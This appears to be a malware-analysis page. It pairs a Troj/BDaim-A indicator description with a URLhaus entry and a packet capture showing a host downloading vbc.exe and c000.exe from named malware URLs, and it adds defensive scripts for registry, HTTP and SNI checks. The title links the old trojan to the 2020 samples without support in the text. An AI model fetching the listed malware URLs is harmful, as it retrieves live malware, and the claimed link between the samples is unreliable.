
Trojan Malware BDaim-A is c000.exe vbc.exe Malicious X.509 SSL Certificate PCAP File Download Traffic Sample


Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in the Windows system folder and creates the following files, also in the system folder:

mswinsck.ocx (the clean Microsoft Winsock control; it is not malicious by itself)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries. Only the AOL Instant Messenger entries are specific to the Trojan: they point the AIM client's server setting at localhost, port 4159 (dword 0x103f). The HKCR entries under CLSID, Interface, MSWinsock.Winsock and TypeLib are the standard COM registration of the bundled (clean) MSWINSCK.OCX and will also be present on any machine where the Winsock control has been registered legitimately, so they are weak indicators on their own:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = "localhost"
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Control\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel = "Apartment"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\(default) = "0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\(default) = "132497"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\(default) = "MSWinsock.Winsock.1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Programmable\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX, 1"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\(default) = "1.0"
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\
HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\(default) = "MSWinsock.Winsock"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "Winsock General Property Page Object"
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "IMSWinsockControl"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020424-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\(default) = "DMSWinsockControlEvents"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32\(default) = "{00020420-0000-0000-C000-000000000046}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\(default) = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\Version = "1.0"
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1\(default) = "Microsoft WinSock Control, version 6.0"
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID\(default) = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer\(default) = "MSWinsock.Winsock.1"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\(default) = "Microsoft Winsock Control 6.0 (SP5)"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32\(default) = "C:\WINDOWS\System32\MSWINSCK.OCX"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS\(default) = "2"
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\
HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR\(default) = ""
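The practical way to hunt for the entries above is to export the relevant keys with reg export and check the result against the indicators rather than eyeballing the list. The script below is an added example (not from the original write-up or from any vendor tool): it parses the .reg format, decodes the dword port, and flags only the two trojan-specific findings, the autostart image and the AIM server redirection, while ignoring the benign Winsock COM registration. The .reg text is constructed here to mirror the entries above, and the indicator names (IOC_RUN_IMAGES, AIM_SERVER_KEY) are this example's own.

```python
"""Parse a Windows .reg export and flag the Troj/BDaim-A indicators.

Added example, not from the original write-up. The .reg text below is
constructed to mirror the entries listed above; only the Run value and the
AIM Server Host/Port are trojan-specific, the rest is the normal COM
registration of the clean Microsoft Winsock control.
"""
import re

# Constructed sample: what `reg export` would emit for the keys above.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"uvwxyz"="C:\\WINDOWS\\System32\\uvwxyz.exe"

[HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server]
"Host"="localhost"
"Port"=dword:0000103f

[HKEY_CLASSES_ROOT\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
@="C:\\WINDOWS\\System32\\MSWINSCK.OCX"
"ThreadingModel"="Apartment"
'''

# Hypothetical indicator set, taken from the description above.
IOC_RUN_IMAGES = {"uvwxyz.exe"}
AIM_SERVER_KEY = r"HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server"

_KEY_RE = re.compile(r"^\[(.+)\]$")
# value name in quotes (with \" and \\ escapes) or @ for the default value
_VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _decode_value(raw):
    """Decode the right-hand side of a single-line .reg value to a Python object."""
    if raw.startswith('"'):
        # REG_SZ: strip the quotes and undo the \" and \\ escapes
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.startswith("dword:"):
        return int(raw[6:], 16)          # REG_DWORD is written as 8 hex digits
    if raw.startswith("hex:"):
        return bytes(int(b, 16) for b in raw[4:].split(",") if b)  # single-line REG_BINARY
    return raw                           # other types are left undecoded


def parse_reg(text):
    """Return {key_path: {value_name: value}}; '@' holds the default value."""
    tree, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            tree.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            tree[current][name] = _decode_value(m.group(2))
    return tree


def find_indicators(tree):
    """Return (key, value_name, reason) tuples for the trojan-specific entries."""
    hits = []
    for key, values in tree.items():
        if key.lower().endswith(r"\microsoft\windows\currentversion\run"):
            for name, image in values.items():
                leaf = str(image).replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
                if leaf in IOC_RUN_IMAGES:
                    hits.append((key, name, "known BDaim-A autostart image %s" % leaf))
        if key == AIM_SERVER_KEY:
            host, port = values.get("Host"), values.get("Port")
            if host in ("localhost", "127.0.0.1") and isinstance(port, int):
                hits.append((key, "Host/Port", "AIM client redirected to %s:%d" % (host, port)))
    return hits


if __name__ == "__main__":
    for hit in find_indicators(parse_reg(SAMPLE_REG)):
        print(hit)
```

The parser only handles single-line values; a real export wraps long hex: values across lines with a trailing backslash, which a production version would have to join before decoding.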

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe, which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and those that have been set up by cybercriminals for the sole purpose of serving malware.

Database Entry


ID: 286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status: Offline
Host: f0384177.xsph[.]ru
Date added: 2020-01-11 10:33:04 UTC
Threat: Malware download

The tcpdump -A excerpt below shows the host 192.168.86.25 downloading vbc.exe from windowsdefenderserversecureserver.duckdns.org (151.80.241.110), then requesting c000.exe from f0384177.xsph.ru (141.8.192.151), which by the time of the capture only returned the hosting provider's 503 stub page, followed by TLS connections to index.from.sh for that stub page's stylesheets. Raw IP/TCP header bytes that tcpdump prints before each payload have been trimmed; the captured HTTP headers are unchanged.

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: “16ea00-59c3a4efb28b9”
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />
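What a detection engineer wants from these two exchanges is a rule that fires on the first (a PE served with Content-Type application/x-msdownload to a browser-style request) and stays quiet on the second (a 503 stub page). The script below is an added example, not code from the original post: it parses raw HTTP request/response pairs and classifies them. The two exchanges are reconstructed from the headers captured above (bodies truncated to their first bytes, Accept headers shortened) so that it runs offline; the EXECUTABLE_TYPES set is this example's own choice.

```python
"""Flag executable downloads in captured HTTP request/response pairs.

Added example, not from the original post. The two exchanges below are
constructed from the tcpdump output above (headers as captured, bodies
truncated to their first bytes) so the script runs offline.
"""

# Constructed samples: request/response pairs as raw bytes.
EXCHANGES = [
    {
        "client": "192.168.86.25", "server": "151.80.241.110",
        "request": (
            b"GET /mich/vbc.exe HTTP/1.1\r\n"
            b"Accept: image/jpeg, application/x-ms-application, image/gif, */*\r\n"
            b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\n"
            b"Host: windowsdefenderserversecureserver.duckdns.org\r\n"
            b"Connection: Keep-Alive\r\n\r\n"),
        "response": (
            b"HTTP/1.1 200 OK\r\n"
            b"Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38\r\n"
            b"Content-Length: 1501696\r\n"
            b"Content-Type: application/x-msdownload\r\n\r\n"
            b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"),
    },
    {
        "client": "192.168.86.25", "server": "141.8.192.151",
        "request": (
            b"GET /LO/c000.exe HTTP/1.1\r\n"
            b"Accept: image/jpeg, application/x-ms-application, image/gif, */*\r\n"
            b"Host: f0384177.xsph.ru\r\n\r\n"),
        "response": (
            b"HTTP/1.1 503 Service Unavailable\r\n"
            b"Server: openresty\r\n"
            b"Content-Type: text/html; charset=UTF-8\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n"
            b"2806\r\n<!DOCTYPE html>"),
    },
]

# MIME types under which PE files are commonly served (example's own list).
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec",
                    "application/octet-stream",
                    "application/vnd.microsoft.portable-executable"}


def parse_http(raw):
    """Split a raw HTTP message into (start_line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify(exchange):
    """Describe one exchange and list the reasons, if any, it looks like a dropper download."""
    req_line, req_hdrs, _ = parse_http(exchange["request"])
    status_line, resp_hdrs, body = parse_http(exchange["response"])
    method, path, _ = req_line.split(" ", 2)
    status = int(status_line.split(" ")[1])
    ctype = resp_hdrs.get("content-type", "").split(";")[0].strip().lower()
    reasons = []
    if status == 200:
        if ctype in EXECUTABLE_TYPES:
            reasons.append("Content-Type %s" % ctype)
        if body.startswith(b"MZ"):
            reasons.append("body starts with MZ (PE header)")
        # A PE body answering a request whose Accept header advertises an image/page
        # fetch is the pattern in the capture above: a browser-looking client pulling a binary.
        if body.startswith(b"MZ") and "image/" in req_hdrs.get("accept", ""):
            reasons.append("PE delivered to a browser-style Accept header")
    return {
        "url": "http://%s%s" % (req_hdrs.get("host", exchange["server"]), path),
        "server": exchange["server"],
        "method": method,
        "status": status,
        "length": resp_hdrs.get("content-length"),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


if __name__ == "__main__":
    for ex in EXCHANGES:
        print(classify(ex))
```

Checking the body for the MZ signature as well as the Content-Type matters because a server can label a PE as text/html or image/gif; the header check alone would miss that, while the magic-byte check alone would miss a download whose first segment was not captured.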

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
[TLS ClientHello; the server_name (SNI) extension carries index.from.sh]
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
[TLS ClientHello; SNI index.from.sh]
2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460
[TLS ServerHello and Certificate messages. The DER payload is binary; the fields legible in the ASCII dump are:
  Leaf certificate: issuer C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA; subject OU=Domain Control Validated, OU=Hosted by OnlineNic Inc, OU=PositiveSSL, CN=index.from.sh; not before 2018-03-12 00:00:00Z, not after 2020-03-11 23:59:59Z; SAN index.from.sh, www.index.from.sh; CPS https://secure.comodo.com/CPS; CRL http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl; CA issuers http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt; OCSP http://ocsp.comodoca.com
  Intermediate certificate: issuer C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Certification Authority; subject C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA; not before 2014-02-12 00:00:00Z, not after 2029-02-11 23:59:59Z; CRL http://crl.comodoca.com/COMODORSACertificationAuthority.crl; CA issuers http://crt.comodoca.com/COMODORSAAddTrustCA.crt; OCSP http://ocsp.comodoca.com]

Note that this TLS session is not command-and-control traffic. The 503 stub page returned for c000.exe links its stylesheets from https://index.from.sh/, the client fetched them, and the certificate presented is index.from.sh's own domain-validated PositiveSSL certificate. That host belongs to the hosting provider's placeholder page, not to the malware's infrastructure, and the certificate should not be treated as a malicious indicator on its own.
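Even without decrypting the session, the ClientHello above gives away the destination host name through the SNI extension, which is how an analyst ties the 443 traffic to index.from.sh in the first place. The script below is an added example, not code from the original post: it builds a minimal TLS 1.2 ClientHello record carrying an SNI extension and then parses the SNI back out of the raw record, tolerating truncated or non-handshake records. The record is constructed locally (the real ClientHello in the capture is 126 bytes and carries more extensions), and the two cipher suites in the default list are this example's own choice.

```python
"""Recover the SNI host name from a TLS ClientHello without decrypting anything.

Added example, not from the original post. The record is constructed here
with build_client_hello() so the script runs offline; it mirrors what the
two ClientHello packets above carry (server_name = index.from.sh).
"""
import os
import struct


def build_client_hello(server_name, cipher_suites=(0x002F, 0x0035)):
    """Construct a minimal TLS 1.2 ClientHello record with an SNI extension."""
    host = server_name.encode("ascii")
    # server_name entry: name_type 0 (host_name), 2-byte length, name
    sni_entry = b"\x00" + struct.pack("!H", len(host)) + host
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list   # type 0 = server_name
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (
        b"\x03\x03" + os.urandom(32)               # client_version, random
        + b"\x00"                                   # session_id length 0
        + struct.pack("!H", len(suites)) + suites   # cipher_suites
        + b"\x01\x00"                               # one compression method: null
        + struct.pack("!H", len(sni_ext)) + sni_ext # extensions
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type 1 = ClientHello, 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake  # record: handshake, TLS 1.0 hdr


def _walk_client_hello(record):
    if record[0] != 0x16:                       # content type 22 = handshake
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:                           # handshake type 1 = ClientHello
        return None
    hs_len = int.from_bytes(hs[1:4], "big")
    p = hs[4:4 + hs_len]
    pos = 2 + 32                                # skip version + random
    sid_len = p[pos]; pos += 1 + sid_len
    cs_len = struct.unpack("!H", p[pos:pos + 2])[0]; pos += 2 + cs_len
    cm_len = p[pos]; pos += 1 + cm_len
    if pos + 2 > len(p):
        return None                             # no extensions block at all
    ext_len = struct.unpack("!H", p[pos:pos + 2])[0]; pos += 2
    end = pos + ext_len
    while pos + 4 <= end:
        etype, elen = struct.unpack("!HH", p[pos:pos + 4]); pos += 4
        data = p[pos:pos + elen]; pos += elen
        if etype != 0x0000:
            continue
        q = 2                                   # skip the 2-byte server_name list length
        while q + 3 <= len(data):
            ntype = data[q]
            nlen = struct.unpack("!H", data[q + 1:q + 3])[0]
            if ntype == 0 and q + 3 + nlen <= len(data):
                return data[q + 3:q + 3 + nlen].decode("ascii", "replace")
            q += 3 + nlen
    return None


def extract_sni(record):
    """Return the SNI host name from a TLS record, or None if absent, truncated or malformed."""
    try:
        return _walk_client_hello(record)
    except (IndexError, struct.error):
        return None


if __name__ == "__main__":
    rec = build_client_hello("index.from.sh")
    print(len(rec), extract_sni(rec))
```

The same walker applied to the payload of each packet with destination port 443 in a capture yields a per-connection host name list, which is usually enough to separate incidental fetches like this one from connections to unknown hosts worth pulling the certificate for.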

Written by admin